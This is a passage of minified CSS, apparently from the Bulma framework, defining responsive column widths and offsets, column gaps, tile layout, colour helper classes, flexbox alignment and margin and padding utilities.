ablet{flex:none;width:91.66667%}.column.is-offset-11,.column.is-offset-11-tablet{margin-left:91.66667%}.column.is-12,.column.is-12-tablet{flex:none;width:100%}.column.is-offset-12,.column.is-offset-12-tablet{margin-left:100%}}@media screen and (max-width:1023px){.column.is-narrow-touch{flex:none;width:unset}.column.is-full-touch{flex:none;width:100%}.column.is-three-quarters-touch{flex:none;width:75%}.column.is-two-thirds-touch{flex:none;width:66.6666%}.column.is-half-touch{flex:none;width:50%}.column.is-one-third-touch{flex:none;width:33.3333%}.column.is-one-quarter-touch{flex:none;width:25%}.column.is-one-fifth-touch{flex:none;width:20%}.column.is-two-fifths-touch{flex:none;width:40%}.column.is-three-fifths-touch{flex:none;width:60%}.column.is-four-fifths-touch{flex:none;width:80%}.column.is-offset-three-quarters-touch{margin-left:75%}.column.is-offset-two-thirds-touch{margin-left:66.6666%}.column.is-offset-half-touch{margin-left:50%}.column.is-offset-one-third-touch{margin-left:33.3333%}.column.is-offset-one-quarter-touch{margin-left:25%}.column.is-offset-one-fifth-touch{margin-left:20%}.column.is-offset-two-fifths-touch{margin-left:40%}.column.is-offset-three-fifths-touch{margin-left:60%}.column.is-offset-four-fifths-touch{margin-left:80%}.column.is-0-touch{flex:none;width:0%}.column.is-offset-0-touch{margin-left:0}.column.is-1-touch{flex:none;width:8.33333%}.column.is-offset-1-touch{margin-left:8.33333%}.column.is-2-touch{flex:none;width:16.66667%}.column.is-offset-2-touch{margin-left:16.66667%}.column.is-3-touch{flex:none;width:25%}.column.is-offset-3-touch{margin-left:25%}.column.is-4-touch{flex:none;width:33.33333%}.column.is-offset-4-touch{margin-left:33.33333%}.column.is-5-touch{flex:none;width:41.66667%}.column.is-offset-5-touch{margin-left:41.66667%}.column.is-6-touch{flex:none;width:50%}.column.is-offset-6-touch{margin-left:50%}.column.is-7-touch{flex:none;width:58.33333%}.column.is-offset-7-touch{margin-left:58.33333%}.column.is-8-touch{flex:none;width:66.66667%}.column.is-offset-8-touch{margin-left:66.66667%}.column.is-9-touch{flex:none;width:75%}.column.is-offset-9-touch{margin-left:75%}.column.is-10-touch{flex:none;width:83.33333%}.column.is-offset-10-touch{margin-left:83.33333%}.column.is-11-touch{flex:none;width:91.66667%}.column.is-offset-11-touch{margin-left:91.66667%}.column.is-12-touch{flex:none;width:100%}.column.is-offset-12-touch{margin-left:100%}}@media screen and (min-width:1024px){.column.is-narrow-desktop{flex:none;width:unset}.column.is-full-desktop{flex:none;width:100%}.column.is-three-quarters-desktop{flex:none;width:75%}.column.is-two-thirds-desktop{flex:none;width:66.6666%}.column.is-half-desktop{flex:none;width:50%}.column.is-one-third-desktop{flex:none;width:33.3333%}.column.is-one-quarter-desktop{flex:none;width:25%}.column.is-one-fifth-desktop{flex:none;width:20%}.column.is-two-fifths-desktop{flex:none;width:40%}.column.is-three-fifths-desktop{flex:none;width:60%}.column.is-four-fifths-desktop{flex:none;width:80%}.column.is-offset-three-quarters-desktop{margin-left:75%}.column.is-offset-two-thirds-desktop{margin-left:66.6666%}.column.is-offset-half-desktop{margin-left:50%}.column.is-offset-one-third-desktop{margin-left:33.3333%}.column.is-offset-one-quarter-desktop{margin-left:25%}.column.is-offset-one-fifth-desktop{margin-left:20%}.column.is-offset-two-fifths-desktop{margin-left:40%}.column.is-offset-three-fifths-desktop{margin-left:60%}.column.is-offset-four-fifths-desktop{margin-left:80%}.column.is-0-desktop{flex:none;width:0%}.column.is-offset-0-desktop{margin-left:0}.column.is-1-desktop{flex:none;width:8.33333%}.column.is-offset-1-desktop{margin-left:8.33333%}.column.is-2-desktop{flex:none;width:16.66667%}.column.is-offset-2-desktop{margin-left:16.66667%}.column.is-3-desktop{flex:none;width:25%}.column.is-offset-3-desktop{margin-left:25%}.column.is-4-desktop{flex:none;width:33.33333%}.column.is-offset-4-desktop{margin-left:33.33333%}.column.is-5-desktop{flex:none;width:41.66667%}.column.is-offset-5-desktop{margin-left:41.66667%}.column.is-6-desktop{flex:none;width:50%}.column.is-offset-6-desktop{margin-left:50%}.column.is-7-desktop{flex:none;width:58.33333%}.column.is-offset-7-desktop{margin-left:58.33333%}.column.is-8-desktop{flex:none;width:66.66667%}.column.is-offset-8-desktop{margin-left:66.66667%}.column.is-9-desktop{flex:none;width:75%}.column.is-offset-9-desktop{margin-left:75%}.column.is-10-desktop{flex:none;width:83.33333%}.column.is-offset-10-desktop{margin-left:83.33333%}.column.is-11-desktop{flex:none;width:91.66667%}.column.is-offset-11-desktop{margin-left:91.66667%}.column.is-12-desktop{flex:none;width:100%}.column.is-offset-12-desktop{margin-left:100%}}@media screen and (min-width:1216px){.column.is-narrow-widescreen{flex:none;width:unset}.column.is-full-widescreen{flex:none;width:100%}.column.is-three-quarters-widescreen{flex:none;width:75%}.column.is-two-thirds-widescreen{flex:none;width:66.6666%}.column.is-half-widescreen{flex:none;width:50%}.column.is-one-third-widescreen{flex:none;width:33.3333%}.column.is-one-quarter-widescreen{flex:none;width:25%}.column.is-one-fifth-widescreen{flex:none;width:20%}.column.is-two-fifths-widescreen{flex:none;width:40%}.column.is-three-fifths-widescreen{flex:none;width:60%}.column.is-four-fifths-widescreen{flex:none;width:80%}.column.is-offset-three-quarters-widescreen{margin-left:75%}.column.is-offset-two-thirds-widescreen{margin-left:66.6666%}.column.is-offset-half-widescreen{margin-left:50%}.column.is-offset-one-third-widescreen{margin-left:33.3333%}.column.is-offset-one-quarter-widescreen{margin-left:25%}.column.is-offset-one-fifth-widescreen{margin-left:20%}.column.is-offset-two-fifths-widescreen{margin-left:40%}.column.is-offset-three-fifths-widescreen{margin-left:60%}.column.is-offset-four-fifths-widescreen{margin-left:80%}.column.is-0-widescreen{flex:none;width:0%}.column.is-offset-0-widescreen{margin-left:0}.column.is-1-widescreen{flex:none;width:8.33333%}.column.is-offset-1-widescreen{margin-left:8.33333%}.column.is-2-widescreen{flex:none;width:16.66667%}.column.is-offset-2-widescreen{margin-left:16.66667%}.column.is-3-widescreen{flex:none;width:25%}.column.is-offset-3-widescreen{margin-left:25%}.column.is-4-widescreen{flex:none;width:33.33333%}.column.is-offset-4-widescreen{margin-left:33.33333%}.column.is-5-widescreen{flex:none;width:41.66667%}.column.is-offset-5-widescreen{margin-left:41.66667%}.column.is-6-widescreen{flex:none;width:50%}.column.is-offset-6-widescreen{margin-left:50%}.column.is-7-widescreen{flex:none;width:58.33333%}.column.is-offset-7-widescreen{margin-left:58.33333%}.column.is-8-widescreen{flex:none;width:66.66667%}.column.is-offset-8-widescreen{margin-left:66.66667%}.column.is-9-widescreen{flex:none;width:75%}.column.is-offset-9-widescreen{margin-left:75%}.column.is-10-widescreen{flex:none;width:83.33333%}.column.is-offset-10-widescreen{margin-left:83.33333%}.column.is-11-widescreen{flex:none;width:91.66667%}.column.is-offset-11-widescreen{margin-left:91.66667%}.column.is-12-widescreen{flex:none;width:100%}.column.is-offset-12-widescreen{margin-left:100%}}@media screen and (min-width:1408px){.column.is-narrow-fullhd{flex:none;width:unset}.column.is-full-fullhd{flex:none;width:100%}.column.is-three-quarters-fullhd{flex:none;width:75%}.column.is-two-thirds-fullhd{flex:none;width:66.6666%}.column.is-half-fullhd{flex:none;width:50%}.column.is-one-third-fullhd{flex:none;width:33.3333%}.column.is-one-quarter-fullhd{flex:none;width:25%}.column.is-one-fifth-fullhd{flex:none;width:20%}.column.is-two-fifths-fullhd{flex:none;width:40%}.column.is-three-fifths-fullhd{flex:none;width:60%}.column.is-four-fifths-fullhd{flex:none;width:80%}.column.is-offset-three-quarters-fullhd{margin-left:75%}.column.is-offset-two-thirds-fullhd{margin-left:66.6666%}.column.is-offset-half-fullhd{margin-left:50%}.column.is-offset-one-third-fullhd{margin-left:33.3333%}.column.is-offset-one-quarter-fullhd{margin-left:25%}.column.is-offset-one-fifth-fullhd{margin-left:20%}.column.is-offset-two-fifths-fullhd{margin-left:40%}.column.is-offset-three-fifths-fullhd{margin-left:60%}.column.is-offset-four-fifths-fullhd{margin-left:80%}.column.is-0-fullhd{flex:none;width:0%}.column.is-offset-0-fullhd{margin-left:0}.column.is-1-fullhd{flex:none;width:8.33333%}.column.is-offset-1-fullhd{margin-left:8.33333%}.column.is-2-fullhd{flex:none;width:16.66667%}.column.is-offset-2-fullhd{margin-left:16.66667%}.column.is-3-fullhd{flex:none;width:25%}.column.is-offset-3-fullhd{margin-left:25%}.column.is-4-fullhd{flex:none;width:33.33333%}.column.is-offset-4-fullhd{margin-left:33.33333%}.column.is-5-fullhd{flex:none;width:41.66667%}.column.is-offset-5-fullhd{margin-left:41.66667%}.column.is-6-fullhd{flex:none;width:50%}.column.is-offset-6-fullhd{margin-left:50%}.column.is-7-fullhd{flex:none;width:58.33333%}.column.is-offset-7-fullhd{margin-left:58.33333%}.column.is-8-fullhd{flex:none;width:66.66667%}.column.is-offset-8-fullhd{margin-left:66.66667%}.column.is-9-fullhd{flex:none;width:75%}.column.is-offset-9-fullhd{margin-left:75%}.column.is-10-fullhd{flex:none;width:83.33333%}.column.is-offset-10-fullhd{margin-left:83.33333%}.column.is-11-fullhd{flex:none;width:91.66667%}.column.is-offset-11-fullhd{margin-left:91.66667%}.column.is-12-fullhd{flex:none;width:100%}.column.is-offset-12-fullhd{margin-left:100%}}.columns{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.columns:last-child{margin-bottom:-.75rem}.columns:not(:last-child){margin-bottom:calc(1.5rem - .75rem)}.columns.is-centered{justify-content:center}.columns.is-gapless{margin-left:0;margin-right:0;margin-top:0}.columns.is-gapless>.column{margin:0;padding:0!important}.columns.is-gapless:not(:last-child){margin-bottom:1.5rem}.columns.is-gapless:last-child{margin-bottom:0}.columns.is-mobile{display:flex}.columns.is-multiline{flex-wrap:wrap}.columns.is-vcentered{align-items:center}@media screen and (min-width:769px),print{.columns:not(.is-desktop){display:flex}}@media screen and (min-width:1024px){.columns.is-desktop{display:flex}}.columns.is-variable{--columnGap:0.75rem;margin-left:calc(-1 * var(--columnGap));margin-right:calc(-1 * var(--columnGap))}.columns.is-variable>.column{padding-left:var(--columnGap);padding-right:var(--columnGap)}.columns.is-variable.is-0{--columnGap:0rem}@media screen and (max-width:768px){.columns.is-variable.is-0-mobile{--columnGap:0rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-0-tablet{--columnGap:0rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-0-tablet-only{--columnGap:0rem}}@media screen and (max-width:1023px){.columns.is-variable.is-0-touch{--columnGap:0rem}}@media screen and (min-width:1024px){.columns.is-variable.is-0-desktop{--columnGap:0rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-0-desktop-only{--columnGap:0rem}}@media screen and (min-width:1216px){.columns.is-variable.is-0-widescreen{--columnGap:0rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-0-widescreen-only{--columnGap:0rem}}@media screen and (min-width:1408px){.columns.is-variable.is-0-fullhd{--columnGap:0rem}}.columns.is-variable.is-1{--columnGap:0.25rem}@media screen and (max-width:768px){.columns.is-variable.is-1-mobile{--columnGap:0.25rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-1-tablet{--columnGap:0.25rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-1-tablet-only{--columnGap:0.25rem}}@media screen and (max-width:1023px){.columns.is-variable.is-1-touch{--columnGap:0.25rem}}@media screen and (min-width:1024px){.columns.is-variable.is-1-desktop{--columnGap:0.25rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-1-desktop-only{--columnGap:0.25rem}}@media screen and (min-width:1216px){.columns.is-variable.is-1-widescreen{--columnGap:0.25rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-1-widescreen-only{--columnGap:0.25rem}}@media screen and (min-width:1408px){.columns.is-variable.is-1-fullhd{--columnGap:0.25rem}}.columns.is-variable.is-2{--columnGap:0.5rem}@media screen and (max-width:768px){.columns.is-variable.is-2-mobile{--columnGap:0.5rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-2-tablet{--columnGap:0.5rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-2-tablet-only{--columnGap:0.5rem}}@media screen and (max-width:1023px){.columns.is-variable.is-2-touch{--columnGap:0.5rem}}@media screen and (min-width:1024px){.columns.is-variable.is-2-desktop{--columnGap:0.5rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-2-desktop-only{--columnGap:0.5rem}}@media screen and (min-width:1216px){.columns.is-variable.is-2-widescreen{--columnGap:0.5rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-2-widescreen-only{--columnGap:0.5rem}}@media screen and (min-width:1408px){.columns.is-variable.is-2-fullhd{--columnGap:0.5rem}}.columns.is-variable.is-3{--columnGap:0.75rem}@media screen and (max-width:768px){.columns.is-variable.is-3-mobile{--columnGap:0.75rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-3-tablet{--columnGap:0.75rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-3-tablet-only{--columnGap:0.75rem}}@media screen and (max-width:1023px){.columns.is-variable.is-3-touch{--columnGap:0.75rem}}@media screen and (min-width:1024px){.columns.is-variable.is-3-desktop{--columnGap:0.75rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-3-desktop-only{--columnGap:0.75rem}}@media screen and (min-width:1216px){.columns.is-variable.is-3-widescreen{--columnGap:0.75rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-3-widescreen-only{--columnGap:0.75rem}}@media screen and (min-width:1408px){.columns.is-variable.is-3-fullhd{--columnGap:0.75rem}}.columns.is-variable.is-4{--columnGap:1rem}@media screen and (max-width:768px){.columns.is-variable.is-4-mobile{--columnGap:1rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-4-tablet{--columnGap:1rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-4-tablet-only{--columnGap:1rem}}@media screen and (max-width:1023px){.columns.is-variable.is-4-touch{--columnGap:1rem}}@media screen and (min-width:1024px){.columns.is-variable.is-4-desktop{--columnGap:1rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-4-desktop-only{--columnGap:1rem}}@media screen and (min-width:1216px){.columns.is-variable.is-4-widescreen{--columnGap:1rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-4-widescreen-only{--columnGap:1rem}}@media screen and (min-width:1408px){.columns.is-variable.is-4-fullhd{--columnGap:1rem}}.columns.is-variable.is-5{--columnGap:1.25rem}@media screen and (max-width:768px){.columns.is-variable.is-5-mobile{--columnGap:1.25rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-5-tablet{--columnGap:1.25rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-5-tablet-only{--columnGap:1.25rem}}@media screen and (max-width:1023px){.columns.is-variable.is-5-touch{--columnGap:1.25rem}}@media screen and (min-width:1024px){.columns.is-variable.is-5-desktop{--columnGap:1.25rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-5-desktop-only{--columnGap:1.25rem}}@media screen and (min-width:1216px){.columns.is-variable.is-5-widescreen{--columnGap:1.25rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-5-widescreen-only{--columnGap:1.25rem}}@media screen and (min-width:1408px){.columns.is-variable.is-5-fullhd{--columnGap:1.25rem}}.columns.is-variable.is-6{--columnGap:1.5rem}@media screen and (max-width:768px){.columns.is-variable.is-6-mobile{--columnGap:1.5rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-6-tablet{--columnGap:1.5rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-6-tablet-only{--columnGap:1.5rem}}@media screen and (max-width:1023px){.columns.is-variable.is-6-touch{--columnGap:1.5rem}}@media screen and (min-width:1024px){.columns.is-variable.is-6-desktop{--columnGap:1.5rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-6-desktop-only{--columnGap:1.5rem}}@media screen and (min-width:1216px){.columns.is-variable.is-6-widescreen{--columnGap:1.5rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-6-widescreen-only{--columnGap:1.5rem}}@media screen and (min-width:1408px){.columns.is-variable.is-6-fullhd{--columnGap:1.5rem}}.columns.is-variable.is-7{--columnGap:1.75rem}@media screen and (max-width:768px){.columns.is-variable.is-7-mobile{--columnGap:1.75rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-7-tablet{--columnGap:1.75rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-7-tablet-only{--columnGap:1.75rem}}@media screen and (max-width:1023px){.columns.is-variable.is-7-touch{--columnGap:1.75rem}}@media screen and (min-width:1024px){.columns.is-variable.is-7-desktop{--columnGap:1.75rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-7-desktop-only{--columnGap:1.75rem}}@media screen and (min-width:1216px){.columns.is-variable.is-7-widescreen{--columnGap:1.75rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-7-widescreen-only{--columnGap:1.75rem}}@media screen and (min-width:1408px){.columns.is-variable.is-7-fullhd{--columnGap:1.75rem}}.columns.is-variable.is-8{--columnGap:2rem}@media screen and (max-width:768px){.columns.is-variable.is-8-mobile{--columnGap:2rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-8-tablet{--columnGap:2rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-8-tablet-only{--columnGap:2rem}}@media screen and (max-width:1023px){.columns.is-variable.is-8-touch{--columnGap:2rem}}@media screen and (min-width:1024px){.columns.is-variable.is-8-desktop{--columnGap:2rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-8-desktop-only{--columnGap:2rem}}@media screen and (min-width:1216px){.columns.is-variable.is-8-widescreen{--columnGap:2rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-8-widescreen-only{--columnGap:2rem}}@media screen and (min-width:1408px){.columns.is-variable.is-8-fullhd{--columnGap:2rem}}.tile{align-items:stretch;display:block;flex-basis:0;flex-grow:1;flex-shrink:1;min-height:-webkit-min-content;min-height:-moz-min-content;min-height:min-content}.tile.is-ancestor{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.tile.is-ancestor:last-child{margin-bottom:-.75rem}.tile.is-ancestor:not(:last-child){margin-bottom:.75rem}.tile.is-child{margin:0!important}.tile.is-parent{padding:.75rem}.tile.is-vertical{flex-direction:column}.tile.is-vertical>.tile.is-child:not(:last-child){margin-bottom:1.5rem!important}@media screen and (min-width:769px),print{.tile:not(.is-child){display:flex}.tile.is-1{flex:none;width:8.33333%}.tile.is-2{flex:none;width:16.66667%}.tile.is-3{flex:none;width:25%}.tile.is-4{flex:none;width:33.33333%}.tile.is-5{flex:none;width:41.66667%}.tile.is-6{flex:none;width:50%}.tile.is-7{flex:none;width:58.33333%}.tile.is-8{flex:none;width:66.66667%}.tile.is-9{flex:none;width:75%}.tile.is-10{flex:none;width:83.33333%}.tile.is-11{flex:none;width:91.66667%}.tile.is-12{flex:none;width:100%}}.has-text-white{color:#fff!important}a.has-text-white:focus,a.has-text-white:hover{color:#e6e6e6!important}.has-background-white{background-color:#fff!important}.has-text-black{color:#0a0a0a!important}a.has-text-black:focus,a.has-text-black:hover{color:#000!important}.has-background-black{background-color:#0a0a0a!important}.has-text-light{color:#f5f5f5!important}a.has-text-light:focus,a.has-text-light:hover{color:#dbdbdb!important}.has-background-light{background-color:#f5f5f5!important}.has-text-dark{color:#363636!important}a.has-text-dark:focus,a.has-text-dark:hover{color:#1c1c1c!important}.has-background-dark{background-color:#363636!important}.has-text-primary{color:#00d1b2!important}a.has-text-primary:focus,a.has-text-primary:hover{color:#009e86!important}.has-background-primary{background-color:#00d1b2!important}.has-text-primary-light{color:#ebfffc!important}a.has-text-primary-light:focus,a.has-text-primary-light:hover{color:#b8fff4!important}.has-background-primary-light{background-color:#ebfffc!important}.has-text-primary-dark{color:#00947e!important}a.has-text-primary-dark:focus,a.has-text-primary-dark:hover{color:#00c7a9!important}.has-background-primary-dark{background-color:#00947e!important}.has-text-link{color:#485fc7!important}a.has-text-link:focus,a.has-text-link:hover{color:#3449a8!important}.has-background-link{background-color:#485fc7!important}.has-text-link-light{color:#eff1fa!important}a.has-text-link-light:focus,a.has-text-link-light:hover{color:#c8cfee!important}.has-background-link-light{background-color:#eff1fa!important}.has-text-link-dark{color:#3850b7!important}a.has-text-link-dark:focus,a.has-text-link-dark:hover{color:#576dcb!important}.has-background-link-dark{background-color:#3850b7!important}.has-text-info{color:#3e8ed0!important}a.has-text-info:focus,a.has-text-info:hover{color:#2b74b1!important}.has-background-info{background-color:#3e8ed0!important}.has-text-info-light{color:#eff5fb!important}a.has-text-info-light:focus,a.has-text-info-light:hover{color:#c6ddf1!important}.has-background-info-light{background-color:#eff5fb!important}.has-text-info-dark{color:#296fa8!important}a.has-text-info-dark:focus,a.has-text-info-dark:hover{color:#368ace!important}.has-background-info-dark{background-color:#296fa8!important}.has-text-success{color:#48c78e!important}a.has-text-success:focus,a.has-text-success:hover{color:#34a873!important}.has-background-success{background-color:#48c78e!important}.has-text-success-light{color:#effaf5!important}a.has-text-success-light:focus,a.has-text-success-light:hover{color:#c8eedd!important}.has-background-success-light{background-color:#effaf5!important}.has-text-success-dark{color:#257953!important}a.has-text-success-dark:focus,a.has-text-success-dark:hover{color:#31a06e!important}.has-background-success-dark{background-color:#257953!important}.has-text-warning{color:#ffe08a!important}a.has-text-warning:focus,a.has-text-warning:hover{color:#ffd257!important}.has-background-warning{background-color:#ffe08a!important}.has-text-warning-light{color:#fffaeb!important}a.has-text-warning-light:focus,a.has-text-warning-light:hover{color:#ffecb8!important}.has-background-warning-light{background-color:#fffaeb!important}.has-text-warning-dark{color:#946c00!important}a.has-text-warning-dark:focus,a.has-text-warning-dark:hover{color:#c79200!important}.has-background-warning-dark{background-color:#946c00!important}.has-text-danger{color:#f14668!important}a.has-text-danger:focus,a.has-text-danger:hover{color:#ee1742!important}.has-background-danger{background-color:#f14668!important}.has-text-danger-light{color:#feecf0!important}a.has-text-danger-light:focus,a.has-text-danger-light:hover{color:#fabdc9!important}.has-background-danger-light{background-color:#feecf0!important}.has-text-danger-dark{color:#cc0f35!important}a.has-text-danger-dark:focus,a.has-text-danger-dark:hover{color:#ee2049!important}.has-background-danger-dark{background-color:#cc0f35!important}.has-text-black-bis{color:#121212!important}.has-background-black-bis{background-color:#121212!important}.has-text-black-ter{color:#242424!important}.has-background-black-ter{background-color:#242424!important}.has-text-grey-darker{color:#363636!important}.has-background-grey-darker{background-color:#363636!important}.has-text-grey-dark{color:#4a4a4a!important}.has-background-grey-dark{background-color:#4a4a4a!important}.has-text-grey{color:#7a7a7a!important}.has-background-grey{background-color:#7a7a7a!important}.has-text-grey-light{color:#b5b5b5!important}.has-background-grey-light{background-color:#b5b5b5!important}.has-text-grey-lighter{color:#dbdbdb!important}.has-background-grey-lighter{background-color:#dbdbdb!important}.has-text-white-ter{color:#f5f5f5!important}.has-background-white-ter{background-color:#f5f5f5!important}.has-text-white-bis{color:#fafafa!important}.has-background-white-bis{background-color:#fafafa!important}.is-flex-direction-row{flex-direction:row!important}.is-flex-direction-row-reverse{flex-direction:row-reverse!important}.is-flex-direction-column{flex-direction:column!important}.is-flex-direction-column-reverse{flex-direction:column-reverse!important}.is-flex-wrap-nowrap{flex-wrap:nowrap!important}.is-flex-wrap-wrap{flex-wrap:wrap!important}.is-flex-wrap-wrap-reverse{flex-wrap:wrap-reverse!important}.is-justify-content-flex-start{justify-content:flex-start!important}.is-justify-content-flex-end{justify-content:flex-end!important}.is-justify-content-center{justify-content:center!important}.is-justify-content-space-between{justify-content:space-between!important}.is-justify-content-space-around{justify-content:space-around!important}.is-justify-content-space-evenly{justify-content:space-evenly!important}.is-justify-content-start{justify-content:start!important}.is-justify-content-end{justify-content:end!important}.is-justify-content-left{justify-content:left!important}.is-justify-content-right{justify-content:right!important}.is-align-content-flex-start{align-content:flex-start!important}.is-align-content-flex-end{align-content:flex-end!important}.is-align-content-center{align-content:center!important}.is-align-content-space-between{align-content:space-between!important}.is-align-content-space-around{align-content:space-around!important}.is-align-content-space-evenly{align-content:space-evenly!important}.is-align-content-stretch{align-content:stretch!important}.is-align-content-start{align-content:start!important}.is-align-content-end{align-content:end!important}.is-align-content-baseline{align-content:baseline!important}.is-align-items-stretch{align-items:stretch!important}.is-align-items-flex-start{align-items:flex-start!important}.is-align-items-flex-end{align-items:flex-end!important}.is-align-items-center{align-items:center!important}.is-align-items-baseline{align-items:baseline!important}.is-align-items-start{align-items:start!important}.is-align-items-end{align-items:end!important}.is-align-items-self-start{align-items:self-start!important}.is-align-items-self-end{align-items:self-end!important}.is-align-self-auto{align-self:auto!important}.is-align-self-flex-start{align-self:flex-start!important}.is-align-self-flex-end{align-self:flex-end!important}.is-align-self-center{align-self:center!important}.is-align-self-baseline{align-self:baseline!important}.is-align-self-stretch{align-self:stretch!important}.is-flex-grow-0{flex-grow:0!important}.is-flex-grow-1{flex-grow:1!important}.is-flex-grow-2{flex-grow:2!important}.is-flex-grow-3{flex-grow:3!important}.is-flex-grow-4{flex-grow:4!important}.is-flex-grow-5{flex-grow:5!important}.is-flex-shrink-0{flex-shrink:0!important}.is-flex-shrink-1{flex-shrink:1!important}.is-flex-shrink-2{flex-shrink:2!important}.is-flex-shrink-3{flex-shrink:3!important}.is-flex-shrink-4{flex-shrink:4!important}.is-flex-shrink-5{flex-shrink:5!important}.is-clearfix::after{clear:both;content:" ";display:table}.is-pulled-left{float:left!important}.is-pulled-right{float:right!important}.is-radiusless{border-radius:0!important}.is-shadowless{box-shadow:none!important}.is-clickable{cursor:pointer!important;pointer-events:all!important}.is-clipped{overflow:hidden!important}.is-relative{position:relative!important}.is-marginless{margin:0!important}.is-paddingless{padding:0!important}.m-0{margin:0!important}.mt-0{margin-top:0!important}.mr-0{margin-right:0!important}.mb-0{margin-bottom:0!important}.ml-0{margin-left:0!important}.mx-0{margin-left:0!important;margin-right:0!important}.my-0{margin-top:0!important;margin-bottom:0!important}.m-1{margin:.25rem!important}.mt-1{margin-top:.25rem!important}.mr-1{margin-right:.25rem!important}.mb-1{margin-bottom:.25rem!important}.ml-1{margin-left:.25rem!important}.mx-1{margin-left:.25rem!important;margin-right:.25rem!important}.my-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.m-2{margin:.5rem!important}.mt-2{margin-top:.5rem!important}.mr-2{margin-right:.5rem!important}.mb-2{margin-bottom:.5rem!important}.ml-2{margin-left:.5rem!important}.mx-2{margin-left:.5rem!important;margin-right:.5rem!important}.my-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.m-3{margin:.75rem!important}.mt-3{margin-top:.75rem!important}.mr-3{margin-right:.75rem!important}.mb-3{margin-bottom:.75rem!important}.ml-3{margin-left:.75rem!important}.mx-3{margin-left:.75rem!important;margin-right:.75rem!important}.my-3{margin-top:.75rem!important;margin-bottom:.75rem!important}.m-4{margin:1rem!important}.mt-4{margin-top:1rem!important}.mr-4{margin-right:1rem!important}.mb-4{margin-bottom:1rem!important}.ml-4{margin-left:1rem!important}.mx-4{margin-left:1rem!important;margin-right:1rem!important}.my-4{margin-top:1rem!important;margin-bottom:1rem!important}.m-5{margin:1.5rem!important}.mt-5{margin-top:1.5rem!important}.mr-5{margin-right:1.5rem!important}.mb-5{margin-bottom:1.5rem!important}.ml-5{margin-left:1.5rem!important}.mx-5{margin-left:1.5rem!important;margin-right:1.5rem!important}.my-5{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.m-6{margin:3rem!important}.mt-6{margin-top:3rem!important}.mr-6{margin-right:3rem!important}.mb-6{margin-bottom:3rem!important}.ml-6{margin-left:3rem!important}.mx-6{margin-left:3rem!important;margin-right:3rem!important}.my-6{margin-top:3rem!important;margin-bottom:3rem!important}.m-auto{margin:auto!important}.mt-auto{margin-top:auto!important}.mr-auto{margin-right:auto!important}.mb-auto{margin-bottom:auto!important}.ml-auto{margin-left:auto!important}.mx-auto{margin-left:auto!important;margin-right:auto!important}.my-auto{margin-top:auto!important;margin-bottom:auto!important}.p-0{padding:0!important}.pt-0{padding-top:0!important}.pr-0{padding-right:0!important}.pb-0{padding-bottom:0!important}.pl-0{padding-left:0!important}.px-0{padding-left:0!important;padding-right:0!important}.py-0{padding-top:0!important;padding-bottom:0!important}.p-1{padding:.25rem!important}.pt-1{padding-top:.25rem!important}.pr-1{padding-right:.25rem!important}.pb-1{padding-bottom:.25rem!important}.pl-1{padding-left:.25rem!important}.px-1{padding-left:.25rem!important;padding-right:.25rem!important}.py-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.p-2{padding:.5rem!important}.pt-2{padding-top:.5rem!important}.pr-2{padding-right:.5rem!important}.pb-2{padding-bottom:.5rem!important}.pl-2{padding-left:.5rem!important}.px-2{padding-left:.5rem!important;padding-right:.5rem!important}.py-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.p-3{padding:.75rem!important}.pt-3{padding-top:.75rem!important}.pr-3{padding-right:.75rem!important}.pb-3{padding-bottom:.75rem!important}.pl-3{padding-left:.75rem!important}.px-3{padding-left:.75rem!important;padding-right:.75rem!important}.py-3{padding-top:.75rem!important;padding-bottom:.75rem!important}.p-4{padding:1rem!important}.pt-4{padding-top:1rem!important}.pr-4{padding-right:1rem!important}.pb-4{padding-bottom:1rem!important}.pl-4{padding-left:1rem!important}.px-4{padding-left:1rem!important;padding-right:1rem!important}.py-4{padding-top:1rem!important;padding-bottom:1rem!important}.p-5{padding:1.5rem!important}.pt-5{padding-top:1